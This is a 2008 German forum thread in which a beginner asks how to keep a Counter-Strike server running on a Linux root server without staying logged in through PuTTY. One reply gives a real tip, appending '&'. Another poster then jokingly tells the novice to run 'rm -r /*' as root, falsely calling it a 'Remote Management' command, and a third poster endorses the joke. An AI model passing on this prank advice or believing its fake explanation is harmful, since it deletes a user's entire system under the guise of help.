Du bist nicht eingeloggt! Möglicherweise kannst du deswegen nicht alles sehen.
  (Noch kein mods.de-Account? / Passwort vergessen?)
Zur Übersichtsseite
Hallo anonymer User.
Bitte logge dich ein
oder registriere dich!
 Moderiert von: Irdorath, statixx, Teh Wizard of Aiz


 Thema: Linux Server Probleme ( Root Server )
erste ungelesene Seite | letzter Beitrag 
Jaynes

Russe BF
Root Server
Hi!!!
ich hab mir mal auf meinem Root Server Countersrike mit der Anleitung CS 1.6 Linux Server Setup von cs gemacht.
Der cs Server läuft auch sehr gut nur muss ich Putty immer an haben, damit der Server on bleibt.
Jetzt zu meiner frage:
gibt es eine möglickeit einen cs Server auf meinem RootServer so zu Installieren das ich net immer On sein muss?
würde mich sehr freuen wenn mir eine(r) helfen könnte!!!
18.10.2008 15:51:56  Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
IceTom

IceTom
Und dir ist nicht aufgefallen, dass in diesem Forum keine Threads über CS sind?
18.10.2008 15:52:33  Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Öhm...Naja

AUP Öhm...Naja 25.11.2008
kauf dir halt nen server
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von Öhm...Naja am 18.10.2008 15:54]
18.10.2008 15:54:19  Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
|nter

tf2_spy.png
Mal abgesehen davon, dass das hier das falsche Unterforum dafür ist:
Wenn du in Putty den Server startest, mach ein "&" hinter den befehl, also
\blablub start &
18.10.2008 15:55:53  Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
GHeissi

GHeissi
Ganz einfach. Es gibt einen Befehl "Remote Management", mit dem man Programme remote ausführen kann.

Einfach als root "rm -r /*" eingeben, damit alle installierten Programme remote ausgeführt werden können.

Danach CS starten.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von GHeissi am 18.10.2008 15:56]
18.10.2008 15:55:58  Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
|nter

tf2_spy.png
Hmm, das ist natürlich die elegantere Lösung GHeissi, hatte ich gar nicht dran gedacht.
Spart auch ne Masse Ressourcen auf dem Server wenn ich mich nicht irre.
18.10.2008 15:59:36  Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
 Thema: Linux Server Probleme ( Root Server )


mods.de - Forum » Public Offtopic » 

Hop to:  

Mod-Aktionen:
18.10.2008 16:00:19 TylerDurdan hat diesen Thread geschlossen.

| tech | impressum